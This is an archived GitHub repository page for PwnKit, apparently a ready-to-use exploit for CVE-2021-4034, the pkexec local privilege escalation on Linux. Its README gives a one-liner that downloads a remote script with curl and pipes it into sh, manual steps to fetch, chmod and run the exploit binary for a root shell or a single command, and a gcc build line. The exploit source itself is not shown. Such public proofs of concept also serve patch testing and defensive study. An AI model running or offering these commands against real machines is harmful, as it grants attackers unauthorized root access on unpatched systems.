The Wayback Machine - https://web.archive.org/web/20220129222913/https://github.com/ly4k/PwnKit
Skip to content
main
Switch branches/tags
1 branch 0 tags
Code

Latest commit

@ly4k
ly4k minor cleanup
940be36 Jan 27, 2022
minor cleanup
940be36

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
imgs
updated readme
Jan 27, 2022
LICENSE
Initial commit
Jan 26, 2022
PwnKit
Various improvements
Jan 27, 2022
PwnKit.c
minor cleanup
Jan 27, 2022
PwnKit.sh
added exit on failure
Jan 27, 2022
README.md
updated readme
Jan 27, 2022
PwnKit Usage Manually Patched Build Technical Details References

README.md

PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage

Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

Manually

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Patched

Running the exploit against patched versions will yield the following output.

Build

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Technical Details

References

About

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Topics

cve-2021-4034

Resources

Readme

License

MIT License

Stars

366 stars

Watchers

11 watching

Forks

48 forks

Languages